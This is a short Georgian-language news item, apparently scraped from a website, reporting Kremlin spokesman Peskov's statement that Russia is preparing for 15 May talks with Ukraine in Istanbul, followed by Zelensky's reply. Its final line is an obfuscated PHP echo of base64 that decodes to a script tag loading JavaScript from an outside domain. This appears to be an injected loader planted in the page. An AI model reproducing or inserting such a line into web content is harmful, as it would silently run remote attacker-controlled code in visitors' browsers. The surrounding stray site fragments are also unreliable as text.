gorgia
ავერსი jaluzi

რუსეთი სტამბოლში უკრაინასთან მოლაპარაკებებისთვის ემზადება, - ამის შესახებ კრემლის პრესსპიკერმა, დიმიტრი პესკოვმა ბრიფინგზე განაცხადა.

„რუსული მხარე ხუთშაბათს დაგეგმილი მოლაპარაკებებისთვის მზადებას განაგრძობს“, - განაცხადა პესკოვმა.

ამასთან, პესკოვმა სტამბოლში, 15 მაისს დაგეგმილ მოლაპარაკებებზე რუსული დელეგაციის შემადგენლობის დასახელებაზე უარი განაცხადა.

„როგორც კი პრეზიდენტი პუტინი საჭიროდ ჩათვლის, ჩვენ ამას მაშინ გამოვაცხადებთ“, - აღნიშნა პესკოვმა.

შეგახსენებთ, რუსეთის პრეზიდენტი ვლადიმერ პუტინი სტამბოლში 15 მაისს რუსეთ-უკრაინის პირდაპირი მოლაპარაკებების გამართვის შეთავაზებით გამოვიდა. აღნიშნულის საპასუხოდ, უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ განაცხადა, რომ ვლადიმერ პუტინს თურქეთში 15 მაისს პირადად დაელოდება.

86
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");